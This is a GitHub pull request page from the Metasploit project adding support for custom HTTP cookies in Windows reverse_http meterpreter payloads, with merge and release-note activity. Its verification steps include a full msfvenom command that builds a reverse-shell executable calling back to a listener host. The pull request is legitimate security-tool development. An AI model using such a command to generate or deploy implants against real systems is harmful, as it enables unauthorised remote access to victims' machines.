Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add flags to send custom cookies #12873

Merged
merged 2 commits into from
Jan 22, 2020
Merged

Add flags to send custom cookies #12873

merged 2 commits into from
Jan 22, 2020

Conversation

dwelch-r7
Copy link
Contributor

@dwelch-r7 dwelch-r7 commented Jan 21, 2020
edited by busterb
Loading

Resolves #12826

Adds flags to allow for custom cookies to be sent to the handler

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Set up a handler for windows/meterpreter/reverse_http
  • Generate a payload ./msfvenom -p windows/meterpreter/reverse_http LHOST=172.16.111.1 LPORT=80 HttpCookie="cool_id=123456" -f exe > file.exe
  • Set up wireshark to capture the traffice between the target and host machines
  • Run the payload
  • The target machine should make an HTTP request to the host with the cookie cool_id=123456

This has been fixed in the 32 and 64bit payloads, the winhttp payloads don't seem to be affected but the 64bit winhttp payload doesn't appear to set the referrer for some reason where the 32bit one does, haven't figured that one out yet though.

@space-r7 space-r7 added the bug label Jan 21, 2020
@busterb busterb self-assigned this Jan 22, 2020
busterb added a commit that referenced this pull request Jan 22, 2020
@busterb
Land #12873, enable custom cookies in Windows reverse http/https payl…
4770557 
…oads
@busterb busterb merged commit 6632867 into rapid7:master Jan 22, 2020
@busterb
Copy link
Member

busterb commented Jan 22, 2020
edited by tperry-r7
Loading

Release Notes

Resolves an issue where INTERNET_FLAG_NO_COOKIES was not being set. Support was added custom HTTP cookies in reverse HTTP/HTTPS Windows payloads.

msjenkins-r7 pushed a commit that referenced this pull request Jan 22, 2020
@busterb @msjenkins-r7
Land #12873, enable custom cookies in Windows reverse http/https payl…
7606947 
…oads
@tperry-r7 tperry-r7 added rn-enhancement release notes enhancement rn-fix release notes fix and removed rn-enhancement release notes enhancement labels Feb 4, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@wvu wvu wvu left review comments

Assignees

@busterb busterb

Labels
bug rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

msfvenom payload reverse_http not use HttpCookie options value
5 participants
@dwelch-r7 @busterb @wvu @space-r7 @tperry-r7